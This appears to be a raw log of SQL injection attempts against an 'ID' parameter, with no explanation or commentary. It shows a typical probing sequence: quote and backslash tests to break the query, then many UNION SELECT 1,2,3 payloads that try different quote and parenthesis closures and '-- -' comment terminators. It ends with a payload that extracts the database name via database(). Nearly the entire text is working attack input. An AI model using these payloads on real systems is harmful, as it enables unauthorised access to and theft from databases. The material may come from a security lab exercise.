ID:-1'  union select 1,2,3 'a
ID:1
ID:1\
ID:1
ID:1' 'a
ID:1' || 'a
ID:1' union select 1,2,3 || 'a
ID:-1' union select 1,2,3 || 'a
ID:1' union select 1,2,3 || 'a
ID:1' union select 1,2,3  'a
ID:-1' union select 1,2,3  'a
ID:0' union select 1,2,3  'a
ID:1' union select 1,2,3  'a
ID:1' union select 1,2,3  'a
ID:1 ' union select 1,2,3  'a
ID:1" union select 1,2,3  "a
ID:-1" union select 1,2,3  "a
ID:-1" union select 1,2,3  "a
ID:-1" union select 1,2,3  "a
ID:-1" union select 1,2,3  "a
ID:-1" union select 1,2,3  "a
ID:-1" union select 1,2,3  "a
ID:-1" union select 1,2,3  "a
ID:-1"   "a
ID:1"   "a
ID:1'   'a
ID:1"
ID:1'
ID:1" union select 1,2,3  "a
ID:-1" union select 1,2,3  "a
ID:0" union select 1,2,3  "a
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:1
ID:1
ID:1
ID:-1
ID:1 union select 1,2,3
ID:1 union select 1,2,3
ID:1 union select 1,2,3
ID:1 union select 1,2,3
ID:-1 union select 1,2,3
ID:-1 union select 1,2,3
ID:-1 union select 1,2,3
ID:1 union select 1,2,3
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 -- 
ID:1' union select 1,2,3 -- 
ID:1" union select 1,2,3 -- 
ID:1" union select 1,2,3 -- 
ID:1" union select 1,2,3 -- 
ID:1" union select 1,2,3 -- 
ID:1" union select 1,2,3 -- 
ID:1" union select 1,2,3 -- 
ID:1") union select 1,2,3 -- 
ID:1") union select 1,2,3 -- 
ID:1") union select 1,2,3 -- 
ID:1") union select 1,2,3 -- 
ID:1') union select 1,2,3 -- 
ID:1') union select 1,2,3 -- 
ID:1') union select 1,2,3 -- 
ID:1') union select 1,2,3 -- 
ID:1') union select 1,2,3 -- 
ID:-1") union select 1,2,3 -- 
ID:-1") union select 1,2,3 -- 
ID:-1") union select 1,2,3 -- 
ID:-1") union select 1,2,3 -- 
ID:-1") union select 1,2,3 -- 
ID:-1" union select 1,2,3 -- 
ID:-1" union select 1,2,3 -- 
ID:-1" union select 1,2,3 -- 
ID:-1" union select 1,2,3 -- 
ID:-1" union select 1,2,3 -- 
ID:-1" union select 1,2,3 -- 
ID:-1" union select 1,database(),3 -- 
ID:1"
ID:1"
ID:1"
ID:1'
ID:1'
ID:1"
